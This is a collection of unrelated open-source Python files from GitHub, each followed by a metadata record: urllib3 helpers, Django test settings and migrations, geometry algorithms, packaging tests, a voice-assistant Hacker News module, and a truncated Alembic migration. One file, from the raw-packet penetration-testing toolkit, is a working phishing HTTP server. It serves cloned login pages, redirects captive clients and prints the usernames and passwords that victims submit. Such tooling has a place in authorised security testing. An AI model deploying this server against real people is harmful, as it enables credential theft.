self.num_connections += 1
log.info("Starting new HTTPS connection (%d): %s"
% (self.num_connections, self.host))
if not ssl:
return HTTPSConnection(host=self.host, port=self.port)
connection = VerifiedHTTPSConnection(host=self.host, port=self.port)
connection.set_cert(key_file=self.key_file, cert_file=self.cert_file,
cert_reqs=self.cert_reqs, ca_certs=self.ca_certs)
return connection
## Helpers
def make_headers(keep_alive=None, accept_encoding=None, user_agent=None,
basic_auth=None):
"""
Shortcuts for generating request headers.
:param keep_alive:
If ``True``, adds 'connection: keep-alive' header.
:param accept_encoding:
Can be a boolean, list, or string.
``True`` translates to 'gzip,deflate'.
List will get joined by comma.
String will be used as provided.
:param user_agent:
String representing the user-agent you want, such as
"python-urllib3/0.6"
:param basic_auth:
Colon-separated username:password string for 'authorization: basic ...'
auth header.
Example: ::
>>> make_headers(keep_alive=True, user_agent="Batman/1.0")
{'connection': 'keep-alive', 'user-agent': 'Batman/1.0'}
>>> make_headers(accept_encoding=True)
{'accept-encoding': 'gzip,deflate'}
"""
headers = {}
if accept_encoding:
if isinstance(accept_encoding, str):
pass
elif isinstance(accept_encoding, list):
accept_encoding = ','.join(accept_encoding)
else:
accept_encoding = 'gzip,deflate'
headers['accept-encoding'] = accept_encoding
if user_agent:
headers['user-agent'] = user_agent
if keep_alive:
headers['connection'] = 'keep-alive'
if basic_auth:
headers['authorization'] = 'Basic ' + \
basic_auth.encode('base64').strip()
return headers
def get_host(url):
"""
Given a url, return its scheme, host and port (None if it's not there).
For example: ::
>>> get_host('http://google.com/mail/')
('http', 'google.com', None)
>>> get_host('google.com:80')
('http', 'google.com', 80)
"""
# This code is actually similar to urlparse.urlsplit, but much
# simplified for our needs.
port = None
scheme = 'http'
if '://' in url:
scheme, url = url.split('://', 1)
if '/' in url:
url, _path = url.split('/', 1)
if '@' in url:
_auth, url = url.split('@', 1)
if ':' in url:
url, port = url.split(':', 1)
port = int(port)
return scheme, url, port
def connection_from_url(url, **kw):
"""
Given a url, return an :class:`.ConnectionPool` instance of its host.
This is a shortcut for not having to parse out the scheme, host, and port
of the url before creating an :class:`.ConnectionPool` instance.
:param url:
Absolute URL string that must include the scheme. Port is optional.
:param \**kw:
Passes additional parameters to the constructor of the appropriate
:class:`.ConnectionPool`. Useful for specifying things like
timeout, maxsize, headers, etc.
Example: ::
>>> conn = connection_from_url('http://google.com/')
>>> r = conn.request('GET', '/')
"""
scheme, host, port = get_host(url)
if scheme == 'https':
return HTTPSConnectionPool(host, port=port, **kw)
else:
return HTTPConnectionPool(host, port=port, **kw)
|
{
"content_hash": "24b43886045b43e8d1da0f19bf617a27",
"timestamp": "",
"source": "github",
"line_count": 546,
"max_line_length": 80,
"avg_line_length": 34.88278388278388,
"alnum_prop": 0.5833770870523994,
"repo_name": "clofresh/xbmc-vhx",
"id": "c1ebed495299c31ab2e70d782d39127c04305809",
"size": "19278",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "resources/lib/requests/packages/urllib3/connectionpool.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "165555"
}
],
"symlink_target": ""
}
|
"""Settings that need to be set in order to run the tests."""
import os
DEBUG = True
SITE_ID = 1
APP_ROOT = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..'))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
ROOT_URLCONF = 'booking.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(APP_ROOT, '../app_static')
MEDIA_ROOT = os.path.join(APP_ROOT, '../app_media')
STATICFILES_DIRS = (
os.path.join(APP_ROOT, 'static'),
)
TEMPLATES = [{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': [os.path.join(APP_ROOT, 'tests/test_app/templates')],
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.request',
)
}
}]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
EXTERNAL_APPS = [
'django.contrib.admin',
'django.contrib.admindocs',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
'django.contrib.sitemaps',
'django.contrib.sites',
]
INTERNAL_APPS = [
'booking',
'booking.tests.test_app',
]
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
SECRET_KEY = 'foobar'
|
{
"content_hash": "4a927a7cee1fedba1edd30da3604acb5",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 65,
"avg_line_length": 23.446153846153845,
"alnum_prop": 0.6456692913385826,
"repo_name": "bitmazk/django-booking",
"id": "c76f699a9ea94f2a595ab519b9fa849c5551b149",
"size": "1524",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "booking/tests/test_settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140146"
}
],
"symlink_target": ""
}
|
import numpy as np
import random
rng = random.SystemRandom()
from cmath import rect
from collections import deque
def point_aabb(points):
"""Returns the axis-aligned bounding box of the input set of points as (SW corner, NE corner) (lowest and highest parts respectively)."""
preal, pimag = np.real(points), np.imag(points)
return complex(min(preal), min(pimag)), complex(max(preal), max(pimag))
def bridson(w, h):
"""Generates random points in [0, w) × [0, h) separated by at least 1 using Bridson's algorithm."""
# http://www.cs.ubc.ca/~rbridson/docs/bridson-siggraph07-poissondisk.pdf
mesh = 0.70710678118654757
offsets = [(1, 0), (0, 1), (-1, 0), (0, -1), (1, 1), (-1, 1), (-1, -1), (1, -1), (2, 0),
(0, 2), (-2, 0), (0, -2), (2, 1), (1, 2), (-1, 2), (-2, 1), (-2, -1), (-1, -2), (1, -2), (2, -1)]
grid = np.full((int(h / mesh) + 5, int(w / mesh) + 5), -1-1j)
start_y, start_x = h * rng.random(), w * rng.random(); start = complex(start_x, start_y)
grid[int(start_y / mesh) + 2,int(start_x / mesh) + 2] = start; active = [start]; yield start
while active:
pivot, dead = rng.choice(active), True
for q in range(32):
tooclose = False
cand = pivot + rect(np.sqrt(rng.uniform(1, 4)), 2 * np.pi * rng.random())
if not (0 <= cand.real < w and 0 <= cand.imag < h): continue
cand_y, cand_x = int(cand.imag / mesh) + 2, int(cand.real / mesh) + 2
if grid[cand_y,cand_x] != -1-1j: continue
for offset_x, offset_y in offsets:
contrapoint = grid[cand_y + offset_y,cand_x + offset_x]
if contrapoint != -1-1j and abs(cand - contrapoint) < 1: tooclose = True; break
if tooclose: continue
grid[cand_y,cand_x] = cand; active.append(cand); yield cand; dead = False; break
if dead: active.remove(pivot)
return
def chull(points):
"""Computes the convex hull of the given distinct points using Graham's scan. Returns the hull's points' indices.
Points lying exactly on the line between two hull points are excluded."""
if len(points) < 3: return points
start = np.argmin(points) # NumPy sorts complex numbers by real and then imaginary parts; first, leftmost point is automatically on the hull
out = [start]
queue = sorted(range(len(points)), key=lambda n: -2 if n == start else (points[n] - points[start]).imag / abs(points[n] - points[start]))
out.append(queue[1])
for n in queue[2:]:
pn = points[n]
while len(out) > 1:
p1, p2 = points[out[-2]], points[out[-1]]
v, w = p2 - p1, pn - p2
if v.real * w.imag <= v.imag * w.real: out.pop()
else: break
out.append(n)
return out
def wolfe1(alpha, f0, f0_, fa, c = 1e-4):
"""Tests for the first Wolfe or Armijo condition: ϕ(α) ≤ ϕ(0) + cαϕ'(0)."""
return fa <= f0 + c * alpha * f0_
def wolfe2(f0_, fa_, c = 0.9):
"""Tests for the strong second Wolfe or curvature condition: |ϕ'(α)| ≤ c|ϕ'(α)|."""
return abs(fa_) <= c * abs(f0_)
def geommedian_distinct(points, w):
"""Geometric median of input distinct points (represented as a 2D ndarray), which may be of arbitrary dimension.
w is an ndarray of corresponding positive weights. Uses Newton's method with Fletcher's line search
(Algorithms 3.5 and 3.6 in Nocedal & Wright's Numerical Optimization, 2nd edition)."""
N, d = points.shape
# Check if any input point is itself the median. This happens to handle collinear cases too, where the median may not be unique.
for i in range(N):
vecs = points - points[i]
vecls = np.linalg.norm(vecs, axis=1)
vecls[i] = 1
r = np.linalg.norm(w / vecls @ vecs)
if r <= w[i]: return points[i]
def fjh(x): # Returns the function value, Jacobian and Hessian at once
vecs = x - points
vecls = np.linalg.norm(vecs, axis=1)
f = w @ vecls
k = vecs.T / vecls
j = (k * w).sum(axis=1)
l = np.apply_along_axis(lambda v: np.eye(d) - np.outer(v, v), 0, k)
h = (l * w / vecls).sum(axis=2)
return (f, j, h)
x = w @ points / w.sum()
for q in range(32):
fx, jx, hx = fjh(x)
delta = np.linalg.solve(hx, -jx)
def phi(alpha): # ϕ(α) for line search; caches data to avoid recomputation
xa = x + alpha * delta
fa, ja, ha = fjh(xa)
return (alpha, fa, ja @ delta, (xa, fa, ja, ha))
aq = deque([(0, fx, jx @ delta, (x, fx, jx, hx))], 2)
f0_ = aq[0][2] # ϕ'(0)
alpha, accepted, zoom_lo, zoom_hi = 1, None, None, None
for r in range(3): # Main line search (3.5, p. 60)
aq.append(phi(alpha))
if not wolfe1(alpha, fx, f0_, aq[1][1]) or r and aq[1][1] >= aq[0][1]: zoom_lo, zoom_hi = aq[0], aq[1]; break
if wolfe2(f0_, aq[1][2]): accepted = aq[1]; break
if aq[1][2] >= 0: zoom_lo, zoom_hi = aq[1], aq[0]; break
alpha *= 2
if not accepted and zoom_lo: # Zoom procedure (3.6, p. 61)
if abs(f0_) <= 1e-12: return x # Guard against plateaus that form as a result of finite-precision arithmetic
for r in range(10):
alpha = (zoom_lo[0] + zoom_hi[0]) / 2
zoom_mi = phi(alpha)
if not wolfe1(alpha, fx, f0_, zoom_mi[1]) or zoom_mi[1] >= zoom_lo[1]: zoom_hi = zoom_mi
else:
if wolfe2(f0_, zoom_mi[2]): accepted = zoom_mi; break
if zoom_mi[2] * (zoom_hi[0] - zoom_lo[0]) >= 0: zoom_hi = zoom_lo
zoom_lo = zoom_mi
if accepted:
x, fx, jx, hx = accepted[3]
if np.max(np.abs(jx)) <= 1e-12: break
else: break
return x
def geommedian(points, weights = None):
"""Geometric median of input points. Ensures simplicity of the point set passed to geommedian_distinct
by combining coincident points into a single point of higher weight; also ignores non-positive-weighted points."""
p, w = [], []
for i in range(len(points)):
cp, cw = points[i], 1 if weights is None else weights[i]
if cw <= 0: continue
if not p: p.append(cp); w.append(cw)
else:
dists = [np.linalg.norm(q - cp) for q in p]
c = np.argmin(dists)
if dists[c] <= 1e-10 * np.linalg.norm(cp): w[c] += cw
else: p.append(cp); w.append(cw)
return geommedian_distinct(np.array(p), np.array(w))
|
{
"content_hash": "7c5fc28b45ddd5debb3f0795e6696afc",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 144,
"avg_line_length": 50.666666666666664,
"alnum_prop": 0.5651774785801713,
"repo_name": "Parclytaxel/Kinross",
"id": "9b4d5e6f9113fe3ed23ac127a13c8c3815894a0c",
"size": "6647",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kinback/pointset.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "94297"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hypnobox', '0002_auto_20160909_1835'),
]
operations = [
migrations.AlterField(
model_name='lead',
name='product_id',
field=models.CharField(blank=True, max_length=100, verbose_name='product id'),
),
]
|
{
"content_hash": "6f9f4ad99a57bd6640d46514560a656f",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 90,
"avg_line_length": 23.38888888888889,
"alnum_prop": 0.6057007125890737,
"repo_name": "fgmacedo/hypnobox-django",
"id": "6d87043a813dd1ae9e7eb2e5fab82a2d969f0b52",
"size": "493",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "hypnobox/migrations/0003_auto_20160913_1040.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "987"
},
{
"name": "Makefile",
"bytes": "1569"
},
{
"name": "Python",
"bytes": "12655"
}
],
"symlink_target": ""
}
|
"""Tests around project's distribution and packaging."""
import os
import unittest
tests_dir = os.path.dirname(os.path.abspath(__file__))
project_dir = os.path.dirname(tests_dir)
class VersionTestCase(unittest.TestCase):
"""Various checks around project's version info."""
def get_project_name(self):
"""Return project name."""
return 'django-plainpasswordhasher'
def get_package_name(self):
"""Return package name."""
return self.get_project_name().replace('-', '_')
def get_version(self, package):
"""Return project's version defined in package."""
module = __import__(package, globals(), locals(), [], -1)
return module.__version__
def test_version_present(self):
""":PEP:`396` - Project's package has __version__ attribute."""
package_name = self.get_package_name()
try:
self.get_version(package_name)
except ImportError:
self.fail("{package}'s package has no __version__.".format(
package=package_name))
def test_version_match(self):
"""Package's __version__ matches pkg_resources info."""
project_name = self.get_project_name()
package_name = self.get_package_name()
try:
import pkg_resources
except ImportError:
self.fail('Cannot import pkg_resources module. It is part of '
'setuptools, which is a dependency of '
'{project}.'.format(project=project_name))
distribution = pkg_resources.get_distribution(project_name)
installed_version = self.get_version(package_name)
registered_version = distribution.version
self.assertEqual(registered_version, installed_version,
'Version mismatch: {package}.__version__ '
'is "{installed}" whereas pkg_resources tells '
'"{registered}". You may need to run ``make '
'develop`` to update the installed version in '
'development environment.'.format(
package=package_name,
installed=installed_version,
registered=registered_version))
def test_version_file(self):
"""Project's __version__ matches VERSION file info."""
package_name = self.get_package_name()
version_file = os.path.join(project_dir, 'VERSION')
installed_version = self.get_version(package_name)
file_version = open(version_file).read().strip()
self.assertEqual(file_version, installed_version,
'Version mismatch: {package}.__version__ '
'is "{installed}" whereas VERSION file tells '
'"{declared}". You may need to run ``make develop`` '
'to update the installed version in development '
'environment.'.format(
package=package_name,
installed=installed_version,
declared=file_version))
|
{
"content_hash": "57df7b373443ef71af778ac824468a2b",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 78,
"avg_line_length": 44.66197183098591,
"alnum_prop": 0.5629139072847682,
"repo_name": "novapost/django-plainpasswordhasher",
"id": "acbf2b88cfc00d496f735da45c1e4d76cf878c66",
"size": "3195",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/version.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "14350"
}
],
"symlink_target": ""
}
|
import urllib2
import re
import random
from bs4 import BeautifulSoup
from client import app_utils
from semantic.numbers import NumberService
WORDS = ["HACKER", "NEWS", "YES", "NO", "FIRST", "SECOND", "THIRD"]
PRIORITY = 4
URL = 'http://news.ycombinator.com'
class HNStory:
def __init__(self, title, URL):
self.title = title
self.URL = URL
def getTopStories(maxResults=None):
"""
Returns the top headlines from Hacker News.
Arguments:
maxResults -- if provided, returns a random sample of size maxResults
"""
hdr = {'User-Agent': 'Mozilla/5.0'}
req = urllib2.Request(URL, headers=hdr)
page = urllib2.urlopen(req).read()
soup = BeautifulSoup(page)
matches = soup.findAll('td', class_="title")
matches = [m.a for m in matches if m.a and m.text != u'More']
matches = [HNStory(m.text, m['href']) for m in matches]
if maxResults:
num_stories = min(maxResults, len(matches))
return random.sample(matches, num_stories)
return matches
def handle(text, mic, profile):
"""
Responds to user-input, typically speech text, with a sample of
Hacker News's top headlines, sending them to the user over email
if desired.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
mic.say('A', "Pulling up some stories.")
stories = getTopStories(maxResults=3)
all_titles = '... '.join(str(idx + 1) + ") " +
story.title for idx, story in enumerate(stories))
def handleResponse(text):
def extractOrdinals(text):
output = []
service = NumberService()
for w in text.split():
if w in service.__ordinals__:
output.append(service.__ordinals__[w])
return [service.parse(w) for w in output]
chosen_articles = extractOrdinals(text)
send_all = not chosen_articles and app_utils.isPositive(text)
if send_all or chosen_articles:
mic.say('A', "Sure, just give me a moment")
if profile['prefers_email']:
body = "<ul>"
def formatArticle(article):
tiny_url = app_utils.generateTinyURL(article.URL)
if profile['prefers_email']:
return "<li><a href=\'%s\'>%s</a></li>" % (tiny_url,
article.title)
else:
return article.title + " -- " + tiny_url
for idx, article in enumerate(stories):
if send_all or (idx + 1) in chosen_articles:
article_link = formatArticle(article)
if profile['prefers_email']:
body += article_link
else:
if not app_utils.emailUser(profile, SUBJECT="",
BODY=article_link):
mic.say('A', "I'm having trouble sending you " +
"these articles. Please make sure that " +
"your phone number and carrier are " +
"correct on the dashboard.")
return
# if prefers email, we send once, at the end
if profile['prefers_email']:
body += "</ul>"
if not app_utils.emailUser(profile,
SUBJECT="From the Front Page of " +
"Hacker News",
BODY=body):
mic.say('A', "I'm having trouble sending you these " +
"articles. Please make sure that your " +
"phone number and carrier are correct " +
"on the dashboard.")
return
mic.say('A', "All done.")
else:
mic.say('A', "OK I will not send any articles")
if not profile['prefers_email'] and profile['phone_number']:
mic.say('I', "Here are some front-page articles. " +
all_titles + ". Would you like me to send you these? " +
"If so, which?")
handleResponse(mic.activeListen())
else:
mic.say('A', "Here are some front-page articles. " + all_titles)
def isValid(text):
"""
Returns True if the input is related to Hacker News.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\b(hack(er)?|HN)\b', text, re.IGNORECASE))
|
{
"content_hash": "be924e4cd5132409cad7c87bba4dd40c",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 78,
"avg_line_length": 35.1294964028777,
"alnum_prop": 0.5130043006348556,
"repo_name": "brad999/nikita-client",
"id": "d62ff56fa848afe7c781728bc457aa20bd3c9ad0",
"size": "4906",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "client/modules/HN.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "210692"
},
{
"name": "Shell",
"bytes": "310"
}
],
"symlink_target": ""
}
|
"""
phishing.py: Phishing HTTP server (phishing)
Author: Vladimir Ivanov
License: MIT
Copyright 2020, Raw-packet Project
"""
# endregion
# region Import
from raw_packet.Utils.base import Base
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import List, Dict, Tuple, Callable, Union
from json import loads, decoder
from user_agents import parse as user_agent_parse
from os.path import abspath, dirname, isdir, isfile, join
from os import listdir
from socket import AF_INET6
# endregion
# region Authorship information
__author__ = 'Vladimir Ivanov'
__copyright__ = 'Copyright 2020, Raw-packet Project'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.2.1'
__maintainer__ = 'Vladimir Ivanov'
__email__ = 'ivanov.vladimir.mail@gmail.com'
__status__ = 'Development'
__script_name__ = 'Make phishing HTTP pages (phishing)'
# endregion
# region Phishing HTTP Request Handler
class _PhishingHTTPRequestHandler(BaseHTTPRequestHandler):
BaseHTTPRequestHandler.server_version = 'nginx'
BaseHTTPRequestHandler.sys_version = ''
# BaseHTTPRequestHandler.protocol_version = 'HTTP/1.1'
# BaseHTTPRequestHandler.close_connection = True
# region Errors
def error_SendResponse(self, error_code: int):
full_path: str = join(self.server.site_path + self.server.separator + 'errors' +
self.server.separator + str(error_code) + '.html')
if isfile(full_path):
response: bytes = open(full_path, 'rb').read()
else:
response: bytes = bytes('<html>ERROR</html>', encoding='utf-8')
self.send_response(error_code)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
def error_BadRequest(self):
self.error_SendResponse(error_code=400)
def error_FileNotFound(self):
self.error_SendResponse(error_code=404)
def error_NeedContentLegth(self):
self.error_SendResponse(error_code=411)
def error_CheckCreds(self):
response: bytes = bytes('ERROR', 'utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
def redirect(self):
response: bytes = bytes('<HTML><HEAD><TITLE> Web Authentication Redirect</TITLE>'
'<META http-equiv="Cache-control" content="no-cache">'
'<META http-equiv="Pragma" content="no-cache">'
'<META http-equiv="Expires" content="-1">'
'<META http-equiv="refresh" content="1; URL=http://' + self.server.site_domain +
'/"></HEAD></HTML>', 'utf-8')
self.send_response(302)
self.send_header('Location', 'http://' + self.server.site_domain + '/')
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
# endregion
# region Parse User-agent header
@staticmethod
def parse_user_agent(user_agent: Union[None, str]) -> Dict[str, str]:
result: Dict[str, str] = {
'os': 'Other',
'browser': 'Other'
}
if user_agent is None:
raise AttributeError('User-Agent header not found!')
if 'CaptiveNetworkSupport' in user_agent and 'wispr' in user_agent:
result['os']: str = 'Mac OS X'
result['browser']: str = 'Captive'
else:
device = user_agent_parse(user_agent_string=user_agent)
result['os']: str = device.os.family
result['browser']: str = device.browser.family
return result
# endregion
# region Check Host header
def check_host(self, host: Union[None, str]) -> None:
if host is None:
raise AttributeError('Host header not found!')
if self.headers['Host'] != self.server.site_domain:
raise NameError
# endregion
# region Get full to file
def _get_full_path(self, path: str = '/') -> str:
if self.server.separator == '\\':
path: str = path.replace('/', '\\')
if path == self.server.separator:
full_path: str = join(self.server.site_path + self.server.separator + 'index.html')
else:
full_path: str = join(self.server.site_path + self.path)
return full_path
# endregion
# region Get content type by file extension
def _get_content_type(self, path: str = '/index.html') -> str:
content_type: str = 'text/plain'
if path.endswith('.html'):
content_type = 'text/html'
elif path.endswith('.ico'):
content_type = 'image/x-icon'
elif path.endswith('.js'):
content_type = 'text/javascript'
elif path.endswith('.css'):
content_type = 'text/css'
elif path.endswith('.ttf'):
content_type = 'font/ttf'
elif path.endswith('.woff'):
content_type = 'font/woff'
elif path.endswith('.woff2'):
content_type = 'font/woff2'
elif path.endswith('.eot'):
content_type = 'application/vnd.ms-fontobject'
elif path.endswith('.gif'):
content_type = 'image/gif'
elif path.endswith('.png'):
content_type = 'image/png'
elif path.endswith('.svg'):
content_type = 'image/svg+xml'
elif path.endswith('.jpg') or path.endswith('.jpeg'):
content_type = 'image/jpeg'
elif path.endswith('.tif') or path.endswith('.tiff'):
content_type = 'image/tiff'
if path.endswith('.py'):
self.error_FileNotFound()
if path.endswith('.php'):
self.error_FileNotFound()
return content_type + '; charset=UTF-8'
# endregion
# region GET request
def do_GET(self):
try:
user_agent: Dict[str, str] = self.parse_user_agent(self.headers['User-Agent'])
self.check_host(self.headers['Host'])
if self.server.site_path.endswith(self.server.separator + 'apple') and user_agent['os'] == 'Mac OS X':
self.server.site_path += self.server.separator + 'macos_native'
full_path = self._get_full_path(path=self.path)
else:
full_path = self._get_full_path(path=self.path)
content_type = self._get_content_type(path=full_path)
if isfile(full_path):
response: bytes = open(full_path, 'rb').read()
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
else:
raise FileNotFoundError
except AttributeError:
self.error_BadRequest()
except FileNotFoundError:
self.error_FileNotFound()
except NameError:
self.redirect()
# endregion
# region POST request
def do_POST(self):
form: str = self.path
if 'Content-Length' not in self.headers:
self.error_NeedContentLegth()
try:
post_data: str = self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8')
post_data: Dict = loads(post_data)
if form == '/check_username':
response: bytes = bytes(post_data['username'], 'utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', str(len(response)))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(response)
elif form == '/check_credentials':
self.server.base.print_success('Phishing success!'
' Address: ', self.address_string(),
' Username: ', post_data['username'],
' Password: ', post_data['password'])
self.error_CheckCreds()
else:
self.error_FileNotFound()
except decoder.JSONDecodeError:
self.error_BadRequest()
except UnicodeDecodeError:
self.error_BadRequest()
except KeyError:
self.error_CheckCreds()
except UnboundLocalError:
self.error_CheckCreds()
# endregion
# region HEAD request
def do_HEAD(self):
try:
user_agent: Dict[str, str] = self.parse_user_agent(self.headers['User-Agent'])
self.check_host(self.headers['Host'])
full_path = self._get_full_path(path=self.path)
content_type = self._get_content_type(path=self.path)
if isfile(full_path):
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Connection', 'close')
self.end_headers()
else:
raise FileNotFoundError
except AttributeError:
self.send_response(400)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
except FileNotFoundError:
self.send_response(404)
self.send_header('Content-Type', 'text/html')
self.send_header('Connection', 'close')
self.end_headers()
except NameError:
self.send_response(302)
self.send_header('Location', 'http://' + self.server.site_domain + '/')
self.send_header('Connection', 'close')
self.end_headers()
# endregion
# region Log messages
def log_message(self, format, *args):
if not self.server.quiet:
user_agent = self.headers['User-Agent']
host = self.headers['Host']
if host is None:
host = 'None'
if user_agent is None:
user_agent = 'None'
parsed_user_agent = self.parse_user_agent(user_agent)
self.server.base.print_info('Phishing client address: ', self.address_string(),
' os: ', parsed_user_agent['os'],
' browser: ', parsed_user_agent['browser'],
' host: ', host, ' request: ', '%s' % format % args)
# endregion
# endregion
# region Phishing HTTP Server IPv4
class _PhishingHTTPServerIPv4(HTTPServer):
def __init__(self,
server_address: Tuple[str, int],
RequestHandlerClass: Callable[..., BaseHTTPRequestHandler],
base_instance: Base,
site_path: str,
site_domain: Union[None, str] = None,
quiet: bool = False):
super().__init__(server_address, RequestHandlerClass)
self.site_path: str = site_path
self.site_domain: str = site_domain
self.base: Base = base_instance
self.quiet: bool = quiet
if self.base.get_platform().startswith('Windows'):
self.separator: str = '\\'
else:
self.separator: str = '/'
# endregion
# region Phishing HTTP Server IPv6
class _PhishingHTTPServerIPv6(HTTPServer):
address_family = AF_INET6
def __init__(self,
server_address: Tuple[str, int],
RequestHandlerClass: Callable[..., BaseHTTPRequestHandler],
base_instance: Base,
site_path: str,
site_domain: Union[None, str] = None,
quiet: bool = False):
super().__init__(server_address, RequestHandlerClass)
self.site_path: str = site_path
self.site_domain: str = site_domain
self.base: Base = base_instance
self.quiet: bool = quiet
if self.base.get_platform().startswith('Windows'):
self.separator: str = '\\'
else:
self.separator: str = '/'
# endregion
# region Multi Threaded Phishing Server IPv4
class _MultiThreadedPhishingServerIPv4(ThreadingMixIn, _PhishingHTTPServerIPv4):
"""
Handle requests in a separate thread.
"""
# endregion
# region Multi Threaded Phishing Server IPv6
class _MultiThreadedPhishingServerIPv6(ThreadingMixIn, _PhishingHTTPServerIPv6):
"""
Handle requests in a separate thread.
"""
# endregion
# region class Phishing Server
class PhishingServer:
"""
Phishing HTTP server (phishing)
"""
# region Variables
_base: Base = Base(admin_only=True, available_platforms=['Linux', 'Darwin', 'Windows'])
# endregion
# region Start Phishing
def start(self,
address: str = '0.0.0.0',
port: int = 80,
site: str = 'apple',
redirect: str = 'authentication.net',
quiet: bool = False):
"""
Start Phishing HTTP server
:param address: IPv4 address for listening (default: '0.0.0.0')
:param port: TCP port for listening (default: 80)
:param site: Set full path to site or phishing site template 'apple' or 'google' (default: 'apple')
:param redirect: Set phishing site domain for redirect (default: 'authentication.net')
:param quiet: Quiet mode
:return: None
"""
if '::' in address:
self._base.print_info('Wait IPv6 HTTP requests ...')
else:
self._base.print_info('Wait IPv4 HTTP requests ...')
phishing: Union[None, _MultiThreadedPhishingServerIPv4, _MultiThreadedPhishingServerIPv6] = None
try:
if self._base.get_platform().startswith('Windows'):
separator: str = '\\'
else:
separator: str = '/'
if separator in site:
site_path = site
assert isdir(site_path), \
'Could not found site path: ' + self._base.error_text(site_path)
else:
directories: List[str] = list()
current_path: str = dirname(abspath(__file__))
files: List[str] = listdir(current_path)
for file in files:
path: str = join(current_path + separator + file)
if isdir(path):
directories.append(path)
site_path: str = join(current_path + separator + site)
assert site_path in directories, \
'Could not found site template: ' + self._base.error_text(site) + \
' in templates directory: ' + self._base.info_text(current_path)
if '::' in address:
phishing = \
_MultiThreadedPhishingServerIPv6(server_address=(address, port),
RequestHandlerClass=_PhishingHTTPRequestHandler,
base_instance=self._base,
site_path=site_path,
site_domain=redirect,
quiet=quiet)
else:
phishing = \
_MultiThreadedPhishingServerIPv4(server_address=(address, port),
RequestHandlerClass=_PhishingHTTPRequestHandler,
base_instance=self._base,
site_path=site_path,
site_domain=redirect,
quiet=quiet)
phishing.serve_forever()
except OSError:
if not quiet:
self._base.print_error('Port: ', str(port), ' already listen!')
exit(1)
except KeyboardInterrupt:
if phishing is not None:
phishing.server_close()
if not quiet:
self._base.print_info('Exit')
exit(0)
except AssertionError as Error:
if phishing is not None:
phishing.server_close()
if not quiet:
self._base.print_error(Error.args[0])
exit(1)
# endregion
# endregion
|
{
"content_hash": "b9902aa81bdeb1fa24542fc519bb82c1",
"timestamp": "",
"source": "github",
"line_count": 448,
"max_line_length": 114,
"avg_line_length": 38.145089285714285,
"alnum_prop": 0.5471941014687811,
"repo_name": "Vladimir-Ivanov-Git/raw-packet",
"id": "347a2556c3135a2b027ebd856872f17d5a5fb46a",
"size": "17110",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "raw_packet/Servers/Phishing/phishing.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2527277"
},
{
"name": "Shell",
"bytes": "189"
}
],
"symlink_target": ""
}
|
"""empty message
Revision ID: 3088dcf95e92
Revises: 0a0bf059f762
Create Date: 2017-02-25 21:24:25.752377
"""
# revision identifiers, used by Alembic.
revision = '3088dcf95e92'
down_revision = '0a0bf059f762'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('pending_ride', sa.Column('external_ride_id', sa.String(), nullable=True))
### end Alembic commands ###
def downgrade():
